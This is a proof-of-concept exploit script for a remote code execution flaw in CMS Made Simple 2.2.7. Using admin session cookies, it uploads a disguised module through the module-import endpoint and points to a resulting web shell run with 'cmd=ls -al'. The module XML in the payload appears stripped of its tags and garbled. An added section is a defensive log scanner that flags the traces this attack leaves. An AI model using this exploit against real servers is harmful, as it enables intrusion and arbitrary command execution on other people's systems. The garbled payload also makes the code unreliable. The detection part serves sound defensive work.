# Exploit Title: CMS Made Simple 2.2.7 - Remote Code Execution
# Date: 04-11-2018
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Website: https://nitesculucian.github.io
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: 2.2.7
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-10517

# 1. Description:
# CMS Made Simple is an Open Source Content Management System. It's built using PHP and the Smarty Engine, which keeps content, functionality, and templates separated.
# An attacker or a malicious user with access to the administration interface can execute code on the server.

# 2. Proof of Concept:

import requests

# target configuration (admin credentials are required in order to obtain a valid session)
target_url = ""
session_cookie = ""
session_value = ""

# upload of shell under the name of Matomo plugin
burp0_url = target_url + "/admin/moduleinterface.php"
burp0_cookies = {session_cookie: session_value}
burp0_headers = {
    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Referer": "http://gk1v1ml3nfrd1bs00o69fmwnh.public2.attackdefenselabs.com/",
    "Content-Type": "multipart/form-data; boundary=---------------------------207726338310671742711263591267",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
}
burp0_data = "-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"mact\"\r\n\r\nModuleManager,m1_,local_import,0\r\n-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"__c\"\r\n\r\n9a63802b6c4579cc01c\r\n-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"m1_upload\"; filename=\"test.xml\"\r\nContent-Type: text/xml\r\n\r\n\n 1.3\n Matomo\n 0.0.1\n 2.1.5\n \n \n \n \n /\n 1\n \n \n /action.admin_settings.php\n 0\n \n \n \n /action.admin_statistics.php\n 0\n \n \n \n /action.default.php\n 0\n \n \n \n /action.savesettings.php\n 0\n \n \n \n /lang/\n 1\n \n \n /lang/en_US.php\n 0\n \n \n \n /Matomo.module.php\n 0\n \n \n \n /moduleinfo.ini\n 0\n \n \n \n /templates/\n 1\n \n \n /templates/adminsettings.tpl\n 0\n \n \n\r\n-----------------------------207726338310671742711263591267--\r\n"
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

print("Try to access your web shell at: " + target_url + "/modules/Matomo/action.admin_settings.php?cmd=ls%20-al")

# 3. Solution:
# There is no publicly available solution.
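
# Added detection example (not part of the original exploit and not CMS Made Simple code): it scans web access logs for the trace this PoC leaves, a direct request to a PHP file under /modules/ following a POST to /admin/moduleinterface.php from the same client.
# Assumptions: combined log format, constructed sample lines, and the premise that module PHP files are normally loaded through moduleinterface.php rather than requested directly.

```python
import re
from urllib.parse import urlsplit

# Constructed sample access-log lines (combined log format); IPs and times are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Nov/2018:10:01:12 +0000] "POST /admin/moduleinterface.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Nov/2018:10:01:15 +0000] "GET /modules/Matomo/action.admin_settings.php?cmd=ls%20-al HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [04/Nov/2018:10:02:00 +0000] "GET /admin/moduleinterface.php?mact=News,m1_,defaultadmin,0 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
198.51.100.4 - - [04/Nov/2018:10:02:05 +0000] "GET /modules/News/images/icon.gif HTTP/1.1" 200 345 "-" "Mozilla/5.0"
192.0.2.9 - - [04/Nov/2018:10:03:00 +0000] "GET /modules/Search/action.default.php HTTP/1.1" 200 0 "-" "curl/7.58.0"
"""

# Assumption: module PHP files are not meant to be requested directly. The multipart
# "mact" field is not logged, so any POST to the module interface is the import signal.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
MODULE_PHP_RE = re.compile(r'^/modules/([^/]+)/.+\.php$', re.IGNORECASE)
IMPORT_PATH = "/admin/moduleinterface.php"

def find_suspicious(log_text):
    """Return findings for successful direct hits on module PHP files.

    severity 'high'  : the same client POSTed to moduleinterface.php earlier
                       and the request carries a query string.
    severity 'medium': any other successful direct request to a module PHP file.
    """
    posted = set()   # client IPs already seen POSTing to the module interface
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, method, target, status = m.groups()
        url = urlsplit(target)
        if method == "POST" and url.path == IMPORT_PATH:
            posted.add(ip)
            continue
        mod = MODULE_PHP_RE.match(url.path)
        if mod and status.startswith("2"):
            high = ip in posted and bool(url.query)
            findings.append({"ip": ip, "time": ts, "module": mod.group(1),
                             "path": url.path, "query": url.query,
                             "severity": "high" if high else "medium"})
    return findings

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(finding)
```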